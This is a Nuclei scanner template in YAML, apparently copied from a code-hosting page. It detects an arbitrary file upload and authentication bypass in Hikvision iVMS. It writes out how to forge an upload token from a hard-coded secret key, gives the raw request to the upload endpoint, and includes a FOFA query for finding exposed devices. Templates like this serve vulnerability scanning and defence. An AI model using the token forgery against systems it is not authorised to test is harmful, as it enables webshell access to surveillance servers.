30 lines
1.4 KiB
YAML
30 lines
1.4 KiB
YAML
|
id: hikvision-ivms-file-upload-bypass
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: hikvision-ivms-file-upload-bypass
|
||
|
|
author: SleepingBag945
|
||
|
|
severity: critical
|
||
|
|
description: Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the "/resourceOperations/upload" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.
|
||
|
|
reference:
|
||
|
|
- https://blog.csdn.net/qq_41904294/article/details/130807691
|
||
|
|
metadata:
|
||
|
|
verified: true
|
||
|
|
fofa-query: icon_hash="-911494769"
|
||
|
|
tags: hikvision,ivms,intrusive,fileupload,auth-bypass
|
||
|
|
|
||
|
|
http:
|
||
|
|
- raw:
|
||
|
|
- |
|
||
|
|
POST /eps/api/resourceOperations/upload?token={{to_upper(md5(concat("{{RootURL}}","/eps/api/resourceOperations/uploadsecretKeyIbuilding")))}} HTTP/1.1
|
||
|
|
Host: {{Hostname}}
|
||
|
|
Cookie: ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169
|
||
|
|
|
||
|
|
service={{url_encode(concat("{{RootURL}}","/home/index.action"))}}
|
||
|
|
|
||
|
|
matchers-condition: and
|
||
|
|
matchers:
|
||
|
|
- type: dsl
|
||
|
|
dsl:
|
||
|
|
- "status_code_1 == 200 && contains(body_1,'errorMessage') && contains(body_1,'The current request is not a multipart request')"
|
||
|
|
condition: and
|